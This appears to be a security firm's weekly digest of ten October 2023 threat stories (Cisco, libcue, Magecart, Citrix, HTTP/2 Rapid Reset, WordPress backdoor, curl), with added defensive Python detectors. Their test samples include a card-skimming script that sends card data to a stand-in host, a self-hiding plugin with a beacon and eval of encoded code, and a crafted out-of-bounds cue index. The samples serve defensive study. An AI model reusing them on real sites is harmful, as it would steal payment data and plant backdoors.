By security practitioners, for security practitioners

Weekly Top 10 – 10.16.2023 – Critical Vulnerability in Cisco Emergency Responder Software, Desktop Linux Vulnerable to Remote Code Execution via LibCue, Vulnerability in Citrix NetScaler Login Pages Allows for Credential Theft, cURL Patches Two High-Severity Vulnerabilities


Our Threat Operations and Intelligence team compiles a daily digest of the most recent cybersecurity risks. The ten stories below were selected from the 40+ we tracked during the week as the most significant, ranked by risk and drawing on multiple sources where available:

  1. Critical Vulnerability in Cisco Emergency Responder Software

    911 operators use Cisco Emergency Responder to identify a caller's location and route the call to the appropriate emergency services. Cisco disclosed a vulnerability in this software (CVE-2023-20101) with a near-maximum CVSS score of 9.8. The affected release ships with static, hard-coded credentials for the root account, so an attacker who can reach the system can log in as root and take complete control. The credentials cannot be changed or removed, so upgrading to the fixed release is the only remedy.
  2. Factory-Loaded Backdoors Observed on Several Android Devices

    Researchers at Human Security found cheap Android TV boxes and tablets that shipped from the manufacturer with pre-installed malware. They report more than two hundred affected Android TV device models and describe two fraud operations: Badbox, the backdoored devices themselves, and Peachpit, an advertising-fraud scheme spanning 39 iOS and Android applications. The researchers also found vendors selling access to the home networks behind Badbox devices, with one company claiming over twenty million devices worldwide.
  3. Desktop Linux Vulnerable to Remote Code Execution via LibCue

    libcue is a library for parsing cue sheets (track listings for audio discs). GNOME, the most popular Linux desktop environment, uses it in its tracker-miners file indexer, which parses new files in the user's directories automatically. A security advisory in the libcue GitHub repository details a vulnerability (CVE-2023-43641, CVSS 8.8) that yields remote code execution when a malicious .cue file is merely downloaded: the indexer parses it with no user interaction beyond saving the file.
  4. Hacktivists Join the Fray in the Israel-Palestine Conflict

    As the conflict between Israel and Palestine continues to escalate, hackers on both sides have been seen attacking critical infrastructure. The Pro-Palestinian hacker group AnonGhost breached the Israeli RedAlert app, sending thousands of phones fake alerts indicating inbound missiles from the Gaza region, with some phony alerts even regarding inbound nuclear warheads. Pro-Israeli hacker groups have also been observed targeting ICS (industrial control systems) in the Gaza Strip.
  5. Adobe Acrobat Vulnerability Exploited in the Wild

    A use-after-free vulnerability in Adobe Acrobat that allows remote code execution, CVE-2023-21608, was disclosed and patched earlier this year. CISA has now added it to its Known Exploited Vulnerabilities (KEV) catalog, which means exploitation in the wild is confirmed; opening a malicious PDF is enough to compromise the system. Current versions of Acrobat and Reader are not vulnerable, so installations that missed the earlier update should be patched.
  6. Magecart Hides Card Skimming Code in 404 Error Pages

    Magecart card-skimming groups have adopted a fresh way to conceal their code. Akamai reports that the attackers modify a page so that it requests a non-existent resource, such as an icon, which returns the site's default 404 error page. That error page has been altered to carry an HTML comment holding the skimmer's JavaScript, where no ordinary visitor would see it; a small loader on the compromised page extracts the code from the 404 response and runs it. Combined with fake payment forms crafted by the attackers, the skimmer steals payment card data. Any review of a site for injected script should therefore include the 404 page itself.
  7. Vulnerability in Citrix NetScaler Login Pages Allows for Credential Theft

    A critical vulnerability in Citrix NetScaler ADC and Gateway (CVE-2023-3519) was disclosed in July, but exploitation has since become widespread; Bleeping Computer estimated at least two thousand exploited servers by mid-August. Attackers use this remote code execution flaw to inject JavaScript into the appliance's login page, harvesting credentials as users sign in. Initial access brokers (IABs), who have figured prominently in the ransomware lifecycle in recent months, are the most likely to traffic in these credentials.
  8. Cloudflare, Google, Microsoft, and Amazon Observed Record-Breaking DDoS Attack

    Threat actors abused a weakness in the HTTP/2 protocol, since designated HTTP/2 Rapid Reset (CVE-2023-44487), to mount the largest DDoS attacks recorded to date. Google measured a peak of 398 million requests per second, more than seven and a half times the previous record of 46 million requests per second. The targeted providers largely mitigated the attacks, which did not appear to cause service outages.
  9. ‘Legitimate’ Looking WordPress Plugin Created a Backdoor

    Defiant, the company behind the Wordfence WordPress security plugin, discovered a malicious plugin during an incident response engagement on a compromised site. The plugin was described as 'professional looking' and posed as a caching plugin. Once installed, it hooked filters in the administration panel to hide itself from the plugin list. It provides a backdoor with a heartbeat function that tells the attacker whether the infected web server is online, injects spam advertising into pages served to visitors, and redirects them to suspicious websites.
  10. cURL Patches a High-Severity Vulnerability and a Second, Lower-Severity Flaw

    The maintainers of cURL, the ubiquitous command-line tool and library for making web requests, revealed on 10/2 that two vulnerabilities, one rated high severity, would be fixed in a release scheduled for 10/11. The announcement caused a large stir in the security community as everyone waited for details. The patches are now out in curl 8.4.0: CVE-2023-38545 (CVSS 7.5, high) is a heap buffer overflow in the SOCKS5 proxy handshake, reachable when curl is asked to have the proxy resolve a hostname longer than 255 bytes, and CVE-2023-38546 (CVSS 5.0, rated low by the curl project) is a cookie-injection flaw in libcurl. Neither lived up to the buzz, but both are real, and the update should be applied; note that libcurl is embedded in many other products, which need their own vendor updates.
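Item 3 above (libcue): the advisory's root cause is an unchecked track index. The number after INDEX in a cue sheet is converted to a C int and used directly as a subscript into a per-track array, so a value that wraps negative or exceeds the table writes outside it. The parser below is an added example, not libcue's code (which is C); it shows the bounds check a cue-sheet parser must perform and the integer wrap that turns a huge positive number into a negative subscript. The 100-slot table size and the sample sheets are assumptions constructed for the example.

```python
"""Bounds-checked parsing of cue-sheet INDEX lines (added example, not libcue's C code)."""
import re

MAXINDEX = 100  # assumed size of the per-track index table

# "INDEX <number> <mm:ss:ff>": the number is what an unchecked parser would use
# directly as an array subscript.
INDEX_RE = re.compile(r"^INDEX\s+(-?\d+)\s+(\d{1,3}):(\d{2}):(\d{2})$")
TRACK_RE = re.compile(r"^TRACK\s+(\d+)\s+\S+$")


class CueParseError(ValueError):
    """Raised for any line that must not reach the index table."""


def c_int32(n: int) -> int:
    """Value a C int holds after an atoi()-style conversion of n (wraps modulo 2**32)."""
    n &= 0xFFFFFFFF
    return n - (1 << 32) if n & 0x80000000 else n


def msf_to_frames(minutes: int, seconds: int, frames: int) -> int:
    """Convert mm:ss:ff (75 frames per second) to an absolute frame count."""
    if seconds > 59 or frames > 74:
        raise CueParseError(f"bad MSF time {minutes}:{seconds}:{frames}")
    return (minutes * 60 + seconds) * 75 + frames


def parse_cue(text: str) -> list:
    """Return one dict per TRACK, each with a fixed-size `indexes` table.

    Every INDEX number is range-checked before it is used as a subscript; this is
    the check whose absence turns a crafted .cue file into an out-of-bounds write.
    """
    tracks = []
    current = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        track = TRACK_RE.match(line)
        if track:
            current = {"number": int(track.group(1)), "indexes": [None] * MAXINDEX}
            tracks.append(current)
            continue
        m = INDEX_RE.match(line)
        if not m:
            continue  # FILE, TITLE, PREGAP, ... are irrelevant here
        if current is None:
            raise CueParseError(f"line {lineno}: INDEX before any TRACK")
        idx = c_int32(int(m.group(1)))  # what a C parser would have seen
        if not 0 <= idx < MAXINDEX:
            raise CueParseError(f"line {lineno}: INDEX {m.group(1)} out of range "
                                f"(as C int: {idx}; table holds {MAXINDEX})")
        current["indexes"][idx] = msf_to_frames(*(int(g) for g in m.group(2, 3, 4)))
    return tracks


def is_rejected(text: str) -> bool:
    """True when the sheet is refused by the bounds check."""
    try:
        parse_cue(text)
    except CueParseError:
        return True
    return False


# Constructed sample sheets. The second uses a number that wraps to -400000 as a
# C int, i.e. a subscript 400000 slots before the start of the table.
BENIGN_CUE = """\
FILE "album.wav" WAVE
  TRACK 01 AUDIO
    TITLE "Opener"
    INDEX 00 00:00:00
    INDEX 01 00:02:00
"""

MALICIOUS_CUE = """\
FILE "album.wav" WAVE
  TRACK 01 AUDIO
    INDEX 4294567296 00:00:00
"""

if __name__ == "__main__":
    print(parse_cue(BENIGN_CUE)[0]["indexes"][:2])
    print("malicious sheet rejected:", is_rejected(MALICIOUS_CUE))
```

The point of `c_int32` is that a naive "is the number too big?" check on the decimal text is not enough: the parser must check the value the code will actually index with, after the conversion it performs.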
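Items 6 and 7 both come down to JavaScript that does not belong on a page: a skimmer carried in an HTML comment on the 404 page, and a credential harvester injected into a login page. The script below is an added example using this editor's heuristics, not Akamai's or Citrix's detection logic. It parses a page and flags comments carrying base64 payloads that decode to script, external scripts from hosts outside an allowlist, inline scripts that touch card or password fields, and forms that post to a foreign host; `audit_url` requests a live page (use a deliberately non-existent path to get the 404 page). The hostnames and page bodies are constructed samples.

```python
"""Flag injected skimmer/harvester code on a 404 page or login page (added example)."""
import base64
import re
from html.parser import HTMLParser
from urllib.error import HTTPError
from urllib.parse import urlsplit
from urllib.request import urlopen

# A 64+ character base64 run inside an HTML comment is almost never legitimate.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
JS_MARKERS = re.compile(r"\b(eval|atob|btoa|unescape|fetch|XMLHttpRequest|"
                        r"addEventListener|document\.cookie)\b")
SENSITIVE_FIELDS = re.compile(r"(card|cvv|cvc|expir|password|passwd)", re.I)


class PageAuditor(HTMLParser):
    """Collect comments, script sources, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.comments, self.script_srcs = [], []
        self.inline_scripts, self.form_actions = [], []
        self._in_script = False

    def handle_comment(self, data):
        self.comments.append(data)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data)


def _host(url: str) -> str:
    return urlsplit(url).hostname or ""  # "" for relative URLs


def decode_b64(blob: str) -> str:
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:
        return ""
    return raw.decode("utf-8", "replace")


def audit_html(html_text: str, page_host: str, allowed_script_hosts=()) -> list:
    """Return findings as dicts with 'type' and 'detail'; an empty list means clean."""
    p = PageAuditor()
    p.feed(html_text)
    p.close()
    findings = []
    for c in p.comments:
        for blob in B64_RUN.findall(c):
            text = decode_b64(blob)
            if JS_MARKERS.search(text) or SENSITIVE_FIELDS.search(text):
                findings.append({"type": "payload_in_comment", "detail": text[:80]})
        if JS_MARKERS.search(B64_RUN.sub("", c)):
            findings.append({"type": "script_in_comment", "detail": c.strip()[:80]})
    for src in p.script_srcs:
        h = _host(src)
        if h and h != page_host and h not in allowed_script_hosts:
            findings.append({"type": "foreign_script", "detail": src})
    for body in p.inline_scripts:
        if JS_MARKERS.search(body) and SENSITIVE_FIELDS.search(body):
            findings.append({"type": "field_harvesting_script", "detail": body.strip()[:80]})
    for action in p.form_actions:
        h = _host(action)
        if h and h != page_host:
            findings.append({"type": "foreign_form_action", "detail": action})
    return findings


def audit_url(url: str, allowed_script_hosts=(), timeout: float = 10) -> list:
    """Live check; a 404 response body is exactly what we want to inspect."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            body = resp.read()
    except HTTPError as err:
        body = err.read()
    return audit_html(body.decode("utf-8", "replace"), _host(url), allowed_script_hosts)


# Constructed samples (hosts use reserved .example/.invalid names).
SKIMMER_JS = ("document.addEventListener('submit',function(e){var f=e.target;"
              "fetch('https://collect.badcdn.invalid/x',{method:'POST',"
              "body:JSON.stringify({card:f.cardnumber.value,cvv:f.cvv.value})})})")
NOT_FOUND_PAGE = ("<html><head><title>404 Not Found</title></head><body><h1>Page not found</h1>\n<!-- "
                  + base64.b64encode(SKIMMER_JS.encode()).decode() + " -->\n</body></html>")
CLEAN_404 = "<html><body><h1>Not found</h1><!-- rendered by site template --></body></html>"
LOGIN_PAGE = """<html><body>
<form action="/login" method="post"><input name="username"><input type="password" name="password"></form>
<script src="/vendor/jquery.min.js"></script>
<script src="https://static.badcdn.invalid/collect.js"></script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("404", NOT_FOUND_PAGE), ("clean 404", CLEAN_404), ("login", LOGIN_PAGE)):
        print(name, audit_html(page, "shop.example"))
```

Run it against a known-good copy of each page as well as the live one: the allowlist of script hosts should come from that baseline, and any new foreign host, comment payload or form action is the finding to investigate.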
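Item 8: the HTTP/2 weakness behind those records is the stream-cancellation abuse known as HTTP/2 Rapid Reset (CVE-2023-44487). A client opens a stream with HEADERS and immediately cancels it with RST_STREAM, so the number of concurrently open streams never approaches the server's limit while the server still pays the cost of starting each request. The mitigation most servers shipped is to count resets per connection over a sliding window and close connections that exceed a threshold. The simulation below is an added example, not any server's code; the threshold, window, abstract frame tuples and traffic patterns are assumptions.

```python
"""Per-connection RST_STREAM rate guard against HTTP/2 Rapid Reset (added example)."""
from collections import defaultdict, deque


class ResetGuard:
    """Close a connection that sends more than max_resets RST_STREAM frames per window."""

    def __init__(self, max_resets: int = 100, window_s: float = 1.0):
        self.max_resets = max_resets  # assumed threshold; real servers make this configurable
        self.window_s = window_s
        self._resets = defaultdict(deque)  # conn_id -> timestamps of recent resets

    def on_frame(self, conn_id: str, frame_type: str, ts: float) -> str:
        """Return "ok" or "close" for this frame; only RST_STREAM is counted."""
        if frame_type != "RST_STREAM":
            return "ok"
        q = self._resets[conn_id]
        q.append(ts)
        while q and ts - q[0] > self.window_s:  # slide the window forward
            q.popleft()
        return "close" if len(q) > self.max_resets else "ok"


def run(frames, guard: ResetGuard) -> dict:
    """Feed (conn_id, frame_type, ts, stream_id) tuples through the guard.

    Also tracks how many streams are open at once, to show why a concurrent-stream
    limit alone does not catch the attack: the attacker cancels each stream before
    opening the next, so the count never rises above one.
    """
    open_streams = set()
    peak = 0
    for i, (conn, ftype, ts, sid) in enumerate(frames):
        if ftype == "HEADERS":
            open_streams.add(sid)
        elif ftype in ("RST_STREAM", "END_STREAM"):
            open_streams.discard(sid)
        peak = max(peak, len(open_streams))
        if guard.on_frame(conn, ftype, ts) == "close":
            return {"peak_open": peak, "closed_at_frame": i}
    return {"peak_open": peak, "closed_at_frame": None}


def rapid_reset_frames(n: int, conn: str = "attacker", gap: float = 0.0005) -> list:
    """Constructed attack traffic: n HEADERS/RST_STREAM pairs, gap seconds apart."""
    frames = []
    for k in range(n):
        sid, t = 2 * k + 1, k * gap
        frames += [(conn, "HEADERS", t, sid), (conn, "RST_STREAM", t, sid)]
    return frames


def benign_frames(n: int, conn: str = "browser", gap: float = 0.2) -> list:
    """Constructed normal traffic: one request every gap seconds, one in ten cancelled."""
    frames = []
    for k in range(n):
        sid, t = 2 * k + 1, k * gap
        end = "RST_STREAM" if k % 10 == 0 else "END_STREAM"
        frames += [(conn, "HEADERS", t, sid), (conn, end, t + 0.05, sid)]
    return frames


if __name__ == "__main__":
    print("attack:", run(rapid_reset_frames(1000), ResetGuard()))
    print("benign:", run(benign_frames(50), ResetGuard()))
```

The attack connection is cut off at the 101st reset (frame index 201) while its peak of open streams is one, which is exactly why `SETTINGS_MAX_CONCURRENT_STREAMS` on its own was not a defence; the benign client, which cancels an occasional request, never trips the guard.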
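Item 9: a plugin that hides itself does so through WordPress hooks, so two checks catch it even when the admin plugin list looks clean: compare the plugin directories on disk with what WordPress lists, and grep plugin sources for hooks that filter the plugin list, for obfuscated `eval`, and for beacons to outside hosts. The script below is an added example using this editor's heuristics, not Defiant's indicators; the hook names are ones commonly used for hiding, and the sample plugin tree it writes to a temporary directory is constructed.

```python
"""Find a self-hiding WordPress plugin from the filesystem side (added example)."""
import os
import re
import tempfile

# Hooks a plugin can use to hide itself from the admin plugin list or from
# update checks (common technique; assumed list, not a claim about the sample).
HIDING_HOOKS = ("all_plugins", "pre_option_active_plugins",
                "option_active_plugins", "site_transient_update_plugins")
HOOK_RE = re.compile(r"add_(?:filter|action)\s*\(\s*['\"](" + "|".join(HIDING_HOOKS) + r")['\"]")
EVAL_RE = re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
BEACON_RE = re.compile(r"\b(?:wp_remote_(?:get|post)|curl_init|file_get_contents)"
                       r"\s*\(\s*['\"]https?://([^'\"/]+)")


def scan_php(source: str) -> list:
    """Return (rule, detail) pairs for one PHP source string."""
    findings = [("hiding_hook", m.group(1)) for m in HOOK_RE.finditer(source)]
    obfuscated = EVAL_RE.search(source)
    if obfuscated:
        findings.append(("obfuscated_eval", obfuscated.group(0)))
    findings += [("beacon", m.group(1)) for m in BEACON_RE.finditer(source)]
    return findings


def scan_plugins_dir(root: str) -> dict:
    """Map plugin slug -> findings for every plugin directory under root."""
    report = {}
    for slug in sorted(os.listdir(root)):
        plugin_dir = os.path.join(root, slug)
        if not os.path.isdir(plugin_dir):
            continue
        findings = []
        for dirpath, _, files in os.walk(plugin_dir):
            for name in files:
                if name.endswith(".php"):
                    with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
                        findings += scan_php(fh.read())
        if findings:
            report[slug] = findings
    return report


def hidden_on_disk(root: str, listed_slugs) -> set:
    """Plugin directories present on disk that WordPress's own listing omits.

    `listed_slugs` is what the admin plugin page or `wp plugin list` shows; a
    plugin filtering `all_plugins` is absent there but cannot hide its directory.
    """
    on_disk = {d for d in os.listdir(root) if os.path.isdir(os.path.join(root, d))}
    return on_disk - set(listed_slugs)


# Constructed sample plugin sources.
FAKE_CACHE_PLUGIN = r"""<?php
/*
Plugin Name: Super Cache Pro
*/
add_filter('all_plugins', function ($plugins) {
    unset($plugins['super-cache-pro/super-cache-pro.php']);  // vanish from the list
    return $plugins;
});
add_action('init', function () {
    wp_remote_post('https://beacon.c2host.invalid/ping', ['body' => home_url()]);  // heartbeat
    eval(base64_decode(get_option('scp_payload')));
});
"""
CLEAN_PLUGIN = r"""<?php
/*
Plugin Name: Hello Dolly
*/
add_action('admin_notices', 'hello_dolly');
"""


def build_sample_tree() -> str:
    """Write the two sample plugins into a fresh temporary plugins directory."""
    root = tempfile.mkdtemp(prefix="plugins-")
    for slug, name, src in (("super-cache-pro", "super-cache-pro.php", FAKE_CACHE_PLUGIN),
                            ("hello-dolly", "hello.php", CLEAN_PLUGIN)):
        os.makedirs(os.path.join(root, slug))
        with open(os.path.join(root, slug, name), "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print(scan_plugins_dir(root))
    print("on disk but not listed:", hidden_on_disk(root, ["hello-dolly"]))
```

On a real site point `scan_plugins_dir` at `wp-content/plugins` and feed `hidden_on_disk` the slugs from `wp plugin list`; the disk-versus-listing comparison is the check that does not depend on recognising any particular obfuscation.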
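Item 10: the affected ranges from the curl advisories are curl 7.69.0 through 8.3.0 for CVE-2023-38545 and 7.9.1 through 8.3.0 for CVE-2023-38546, both fixed in 8.4.0. The heap overflow is only reachable when curl sends hostnames to a SOCKS5 proxy for resolution (a `socks5h://` proxy URL or `--socks5-hostname`), so exposure also depends on proxy configuration. The script below is an added example, not part of curl: it parses a `curl --version` banner, reports which CVEs the version falls in, and checks a command line and environment for SOCKS5 remote resolution. The sample banner is constructed.

```python
"""Is this curl exposed to CVE-2023-38545 / CVE-2023-38546? (added example, not curl's code)"""
import os
import re
import subprocess

# Inclusive affected ranges from the curl advisories; both fixed in 8.4.0.
AFFECTED = {
    "CVE-2023-38545": ((7, 69, 0), (8, 3, 0)),  # SOCKS5 heap overflow
    "CVE-2023-38546": ((7, 9, 1), (8, 3, 0)),   # cookie injection
}
FIXED_IN = (8, 4, 0)
VERSION_RE = re.compile(r"\bcurl\s+(\d+)\.(\d+)\.(\d+)")


def parse_version(banner: str):
    """Extract (major, minor, patch) from the first line of `curl --version`."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"no curl version in banner: {banner!r}")
    return tuple(int(x) for x in m.groups())


def affected_cves(version) -> list:
    """CVE ids whose affected range contains this version (empty if none)."""
    return [cve for cve, (lo, hi) in AFFECTED.items() if lo <= tuple(version) <= hi]


def socks5_remote_resolve(argv, env) -> bool:
    """True when curl would hand hostnames to a SOCKS5 proxy for resolution.

    That is the precondition for CVE-2023-38545: --socks5-hostname, a proxy given
    as socks5h://, or a socks5h:// proxy taken from the environment.
    """
    args = list(argv)
    if "--socks5-hostname" in args:
        return True
    for i, a in enumerate(args):
        if a in ("-x", "--proxy", "--preproxy") and i + 1 < len(args) \
                and args[i + 1].startswith("socks5h://"):
            return True
        if a.startswith(("--proxy=", "--preproxy=")) and a.split("=", 1)[1].startswith("socks5h://"):
            return True
    for var in ("ALL_PROXY", "all_proxy", "HTTPS_PROXY", "https_proxy", "HTTP_PROXY", "http_proxy"):
        if env.get(var, "").startswith("socks5h://"):
            return True
    return False


def assess(banner: str, argv=(), env=None) -> dict:
    """Combine version and configuration into one verdict."""
    env = os.environ if env is None else env
    version = parse_version(banner)
    cves = affected_cves(version)
    return {
        "version": version,
        "affected": cves,
        "overflow_reachable": "CVE-2023-38545" in cves and socks5_remote_resolve(argv, env),
        "fixed_in": FIXED_IN,
    }


def check_local_curl(argv=()) -> dict:
    """Live check: run the installed curl and assess it (not used by the constructed sample)."""
    banner = subprocess.run(["curl", "--version"], capture_output=True, text=True, check=True).stdout
    return assess(banner, argv)


# Constructed banner in the format curl prints on its first line.
SAMPLE_BANNER = "curl 8.1.2 (x86_64-pc-linux-gnu) libcurl/8.1.2 OpenSSL/3.0.2 zlib/1.2.11"

if __name__ == "__main__":
    print(assess(SAMPLE_BANNER, ["curl", "--socks5-hostname", "proxy.example:1080", "https://shop.example/"], {}))
    print(assess(SAMPLE_BANNER, ["curl", "https://shop.example/"], {}))
```

Two caveats for real use: distributions often backport the fix without bumping the version, so a version-only verdict can be a false positive and should be confirmed against the package changelog; and the libcurl version embedded in other software (the `libcurl/` token in the banner, or a bundled copy in some application) is what matters for those programs, not the system curl binary.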